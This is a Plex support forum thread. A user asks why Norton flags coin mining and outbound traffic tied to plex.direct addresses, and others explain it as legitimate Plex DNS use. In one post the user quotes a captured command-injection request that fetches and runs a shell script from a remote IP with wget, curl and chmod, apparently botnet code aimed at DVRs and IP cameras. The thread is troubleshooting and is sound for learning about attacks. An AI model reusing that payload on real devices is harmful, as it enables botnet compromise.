Norton 360 suddenly saying Plex is coin mining & sending large amounts of data

Plex Media Server Desktops & Laptops
1

So out of nowhere Norton is constantly blocking coin mining activity coming out of a Plex-like address on my computer and going to China! (screenshot attached).
Besides the target address ending in .plex.direct I am also suspicious after my bombardment of warnings ceased after manually shutting down the server and leaving the computer running for over 8 hours.
In addition to this, norton is warning me that a large ammount of data is leaving my computer overnight… I though maybe a false alarm due to plex streaming and norton sees local streaming as something else but now I im not sure.
The calls to china are coming from “SYSTEM”.

Anyone got any ideas?

Suspicious activity (PLEX)
Suspicious activity (PLEX)1093×457 101 KB

3

You didn’t include what PMS version you’re using …

4

Norton jokes aside the connection is clearly being made and to the suspect address. Im Australian… im not trying to connect to china.

5

What is PMS? Relatively new to Plex, dont know the lingo yet.

PlexMediaServer? its 4.30.2 (the latest as far as I can tell, I check regularly especially in times for troubleshooting)

6

Assuming I let this connection through, there must be a reason they are targeting Plex address? Is there a vulnerability with these plex addresses? I dont even know what an address ending in Plex does.

7

It’s Plex dns rebinding. No need to worry imho.

8

I hope Plex patches this method of rebinding as it really looks like an attack:

“/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://104.168.198.235/ffaWfg.sh -O 12.ffaWfg.sh;curl -O http://104.168.198.235/ffaWfg.sh -O 11.ffaWfg.sh; chmod 777 *; sh 11.ffaWfg.sh; sh 12.ffaWfg.sh)&password=admin”

Edit: looks like modified botnet designed to sniff DVR’s and IP Cameras. Very similar code can be found half way down the page here https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/
I guess now its been modified to sniff out plex servers?

Suspicious activity 2 (PLEX)
Suspicious activity 2 (PLEX)988×665 30.9 KB

9

It’s not DNS rebinding. It is a perfectly legit way to use DNS. It is just that many protection routines cannot distinguish it from a rebinding attack.
Background: https://support.plex.tv/articles/206225077-how-to-use-secure-server-connections/

10

This topic was automatically closed 90 days after the last reply. New replies are no longer allowed.